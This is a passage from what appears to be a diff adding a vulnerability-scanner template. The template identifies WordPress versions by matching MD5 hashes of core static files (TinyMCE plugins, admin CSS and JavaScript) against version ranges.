"(\"190f98d73b8e7550e7ec69370bf48b6b\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1216bf3c90d1540a8d29e04f6f9bb7b2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"145af6e3a2d9bfaf7010373f2ba3d835\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"079d5fa2e5111e6f0a10ed6cbf7d9b80\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6bd86bdfb5a42cb4d94163433ba74269\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"645805aedb03bd9f95a5f37ad286d6ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"321d572f5f98e1c84a6ec1775dc3ee69\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"89dcd2e2ea2dd86abe9c00761b806a9c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"6a65f345c92e1b3b2c52e323a739a03f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"695f70d7e94e32459d78ab796a88ab4b\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"b1b633c181b3995b1702d6db1154e37c\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e5554fe0fe4861016f210fcb3ba9de9c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8510f4975434100288bc363aaba2eaae\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"afc4c67509b5f5b52fd2b7556836b69c\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"ba5c8a35df3adc61f0c8abccd371c3fd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1e031c368742554084b13814a53c6261\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"90cc2e0760fa019d3429b601550c6430\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b670d225181c91289ac6efb9809905d7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"15ba49042f9c3070d2bc14798cbaa63d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - 
"(\"f0d5f3037d3ef1d652c2a565ef67ecf1\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"b6f7e5f622295267ff78823f687e67ab\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"611310a2b7739d0e073cb88153237131\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"dcdd5a844af0f8e806e007c3890ba954\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"0a025aad30fc446433312fbfd7b41bde\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6d4e3950e0b34d1b188c3c49a5604f00\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"eb5ecbdece73d7b68b0c7bb0fbde8932\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"b068d94458289ccfca5221fe750b4155\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"900194f71ef56cb47d027a61ed75c1c9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"b15b0fedf40436964822d4c225e36bdb\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"2003f5361b31565d518006c48b649801\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e729f9f1201575a9589363bcf7438cb0\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a3befc9aed67d0169c87284c6c1a95e4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"4c19cd169dac570c6d6675fa82a4f3e5\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d88ec9908ef4412275ccff68861a41c7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7ac22f7e2e534de4364c1de8351b175c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"54b12794da9f72eba7a1b7c742eef081\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fb80dbf401770e6d2f8513cda0adb393\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"44b8f527be46fc591c55a1ef4e4c5781\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.4.4 + dsl: + - 
"(\"111e5c52d4d0f2d41fc16f65884954bc\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"36ce270b0231ea5adefe919ec2661b20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a1f2c45f38a2581ec28d2f41f835a1a2\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"5ef80c55f07303af4e086692f247c1e9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"0966da48749b6e089014a3782c329999\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a75702d3522680cc2d408736ce18eec4\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e54ed18bea6c2c6ae2fd1909987d2416\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2a92c5eb43f95da660c4c58dc1aa2501\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"abba483f4f8fd4d1bb3883dfdbde63b9\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"1b56d9b064a6f1768301a2a33affd140\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"117eed22aeeccaa7a85ad2c2a5760a01\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ca4167ce1c99086ae6f3155af8728d49\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e1d4bfb8b0e0016a1a18599fefb5989e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"537cacc621649c9c258110c56fd8d230\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"611679cf46c9710355e58818e6c9937f\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"077519f391906aea6aa945761a290b3b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"df032317402cd90b340e016447bad44d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7518e2cdcfd5de19abc14cd014d073e7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"e98aa1f1d14fd4fd2b80d456948b6262\" 
== md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"01007fd412c09c53accf6b0e89f4477b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3f92632d9d94229a2f95af15593a8031\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8e833f06a27688ee35e373d1cc7f2afc\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"61fcf1005a8af792f340f449f6a2c988\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0e01b8fa9ea4487455a587c852b405c5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"479122b088e353c76479d24bf10e7f27\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"25d100e4f308bdf6a25f51023529e0cb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e07ad8ce23db15420e3787dc08d415b0\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"af561b86efcd3c53a91ab4070b2c5bc4\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"02d549e3f066d130a5c6346d00529df5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5ee5919f129c64659aa586f39de0c9cc\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"bc30b85daead7b9e041fd7ec7d90700f\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f760faa8361214a1830732827a566ff2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c6f1a4e8396191754e8043b78cc6e8b1\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"27a64401a3200b4df27feac7ac42a058\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"35913878f077f01b45a8d78abd2edacc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"24fe47e6b276803d71f1ca40da9bbbfd\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"172dda34727301b786a0037bf6acf0af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9196f060238471f88c7afbd5ea4aaf08\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"debd3712345e6826f3c09830377622d4\" == md5(body))" + - 
type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"59d610420f74a3c7b3c61ba3fb9456af\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"74eeb188296b161860ba9dbc08f57c54\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"100ac6af835f353443384ea8a4da1da7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5bf25641c9170715b0b6796baa9a708b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c9df035a5e3a22ed64ecbd389a442071\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"eabcc0c5e7d7a437b614fab4089a6810\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f4d14807fae2e4f1be7f50934c4fe5c3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f68bc4e612b9b4887eca532e66687af4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"302689cda1abde975e19e1230b455d29\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e7e22b2197cc81ee0c5cf30460ede00f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f6947b28c386e3637c99d199c4a32a33\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"5a9fd1c52b9007ab3d2afbaa6f2dcf64\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"21cddaeefcf4085a03cb0279e3fa26be\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"fa6c396401a13d727d17409a38d3476e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"88669276cac6721f2c39e4c7b09d9153\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"4447511c25d642d258d7b46cfd4ccf8d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4914c94a70fd5312d9f81037fd0143c3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7973341a787dfbee1b28a142be984a56\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"35c58396b20acee076ea01c9bf7e5663\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + 
dsl: + - "(\"31cbb52c961abeebfd37ab959b5547b5\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"23d3d79737a0fab3785a92caa7e55862\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"501d2e3f75455c53e270bcae6c0446ed\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"f1fb0174b531476f287709b0b9a523e3\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"cea7fcad6f59dceb354ea33628d67926\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"20ec1fe07984f6ada0845df97eb73a86\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"1d53ac0e3f5a8e83d97380b1b01cb19b\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a975fc736cdecddbfb9aed80699fb3af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"62a823564a6191f21e412a42bda1e729\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9a69064e1e7557587181bed581f88a4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"908f23515f075ea7d164a713282989ef\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b81e08e13f223a62c250a6140be14e4b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2ef07d05d7aca6002e56cfbb39b73598\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"97e4d5c63a4bd3a4f073bba5dcab8ca6\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b493359000b7f086c19ac7dfec440a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4a1bb49f35a84d27dc162b7a72c6d15d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"bfb464d0c31eb556a824623537b0da3b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"48140068d8f15c150fee36f905cd98f8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"e3e8c235f96ea51104cde0104ae12010\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f2197bc5fffd870815d914eccf767eb3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9ac5bd4bfdda52b4b9ed21f7f4ba23d8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"48b3c809ddef2ab9a492a5797cae8087\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3ed251ebb3fa879221a7ddaac4374a7b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"35593db173c2dfce8b63f1a39f2eb3b7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"0b2751d087519eff48ee76fa78a70961\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fd0ebb2e5cb4a51dbd122659f4e88042\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"96bd054cdcf2aae77955a0d3d4654225\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e896d069f831a48adac9fc01b74bfd84\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a9bd89b5b0dfa63cd42cb75833ff3a3f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"ecf3a0a1090fd8efb7c2a10e38a9a7f4\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"2bd6b9c1287ded9ed1e668959385119b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"36065a28a39ea8533cf109bd86343f85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e95806e74d09390abc3dc7b8094cdeea\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f651508c7103eca79f012b62fa6a5193\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6306b90e2dc9778074653d97c72d1162\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"572e9e2e3d23c7b899a505bb16d5131a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"06874217e7bf290a096fc10fc90a9a52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"333fb17a509abf264fd13c529939608b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9fa7dcf54586c1d680cea67b449ffd88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a36308e272c9fbdbbd911ddaf399ba0b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"58e017c07fbd95848ec5c98a4e182e85\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f17819c6cfe216f51260cc6621439cc5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"de9a85a063de74e38a9fd4cb41c2b0ce\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"873132014ec1c1918ee9fbc06e0de909\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e4ed9e62c29a97ef0bcd2776b2403f3b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8bcad96ceb3df102985a7c59610548cd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4423dc9caa273de00b935fb0995270fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"0129db65db4c33e5a0449daf4ab89757\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5fd8e3fbdecefd95081fcc49edef3e42\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3a5c1eb7dd2e56931bb9757ddf31bce6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"9be959e6bdbfb8d2cb06af706406265c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"c1896d0a1d14cd707999a253d37ecc5f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fec5f52b672c4c9c1be7699a5ee9fcac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"a3ad4f080bd61da2b9f2f9390b1533d1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4b92734b4cccad235747a460a76ef528\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"99849a20c182bbc6ed8c6aa3fc241f8c\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - 
"(\"c54ced2e822b232f2ad8a5f34930386f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f20cbb755614c908fd94d4f1996c1fee\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c7fa747b3e84baea1545a375324c6d12\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"87ce7e6067f829ba65df86fddb32bf5b\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"46e1341cd4ea49f31046f7d7962adc7f\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"f6ac8cbe225dfa6187ce56623e038faf\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"24ec3750dc03ef23cfea6293dd820779\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"3f1815338eff901c71d41eeac40e23a9\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2dfd550d6f8fc069af07cbc3464f152a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"6ebbd5ec178efc75ad50c9687a8fe39a\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"2415f11a68f436ce1b0a7de8fc59cae8\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6 + dsl: + - "(\"15fc925fd39bb496871e842b2a754c76\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"3f3d922461418335261f26c4f97931c1\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"cd817551314bafab7fcbee0bac282570\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"56404e3a0d0cf24460ddf0604524c77c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9d289d837cdaabecd1fd6aeb38b366e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"e3dfc3b71fefc8c6eb82df54e3460b53\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b695c5dad26818aecad696768ad1bd75\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"865e4f8df693705b404c45fddc1bd65f\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"99602c14980c31323b6851d0c81280fd\" == 
md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"626e31e5abab7aae41a74691d1185e69\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"87a08ca86f25ee997a627ce4a88ec359\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"7d4e28e6dbd4db0ea12ca2244d3ededd\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7ea8bff0af625f7b182f4c0ed9c5b5a6\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3833ce43a5347b4542e8a9a2a76d3079\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fc68948c4bc93d343b8c518d511cac08\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a2ff73ebf42590213238b50ca66bbaca\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"7fa761c7425ce79babb4d790dcea367e\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"9bbabda30eba2bf23c9c9cd3b6afec1f\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"5834e331f60318d3f00b919ccf515e3a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7eb1fe696add412bac5e250b3e7f572c\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8421d4a0813473667bac239989a2fc90\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"dfa3d2ab3f0caa20db92a24bcc0ff904\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"903af8df66abaa627fe19f99d04d3e7e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2f6fd3d7eafc412d3769897be1d35cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b606cf2ba06353b0e383e36b4bd19a30\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"9570431e7a6293435a1592a995fcb11f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"0329aac46a64c9a9453694353cd176b0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"684877d319a91f3766e4474a60b99b9a\" == md5(body))" + - type: dsl + name: 4.2 - 
4.2.29 + dsl: + - "(\"90585237ad358716313a1f5d9b9353b9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"2e2deb24835a5f6c5259690d775a2324\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c01acc3ccd0bbdee1c9d1f31d8cb2be\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"8505a21ad5b4c96db865a6208bd0d017\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"69fdd35fdcf30104974cfd8abba8fe0b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4622152410d656cd0384bf480521150f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"62abb0285535502328c0cf33f5a3db63\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"6d35bcfe2573200a1349a95b8234c411\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"ba82272c84110566e42d32c99897b48f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"5a56a4f83e069ec401c545d97b03c03d\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"111082709bd5b31ec3f6230dcbc2c453\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"0e91417b2af13f8c8dcd183146051cab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"87f424ec96a8076fa69ed5ca77a48051\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f85da534dfaa752cc62b3ae45eaf3a3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor-expand.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c7d8e24f4c208108b7caf2df88d9b54a\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"e7b93fd7ead47026c1becc24527031cb\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"bc3aaa870920e8272d795377983284e6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - 
"(\"a83f982e5c5f7847ae809681d17982c6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e5803492f3d1bf76d8a84775ccc20dd6\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"001eee141532f8fc1fac023dbb945a92\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"4f5ffbf8ea97f6a5399e9b4799da6b47\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2f37f221b8f77ae0e6bbde7b8d03fe43\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d8bf6b8ad0222c5c81abe3445397afb3\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"404895c4518505935866c5eb11047c30\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"88a83136db40e8e8b93f230a6712ea54\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8b2a23ce701d653e25093ee43c221b8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"beab9e6566d2ec701c27bccd8322b2c8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"95ceb9fdb83330b51162d8db3e3a214b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"91a417834bc4155c28b08270bda9b25b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"97336cf7d88da1e9c142069d76f11c23\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"13b554d6a123f78c5cb3b601c24c0e09\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"12f8cfc114d4644e0a8dcb4784a63a79\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"20c2ac6dc65464192456606dae06eae4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 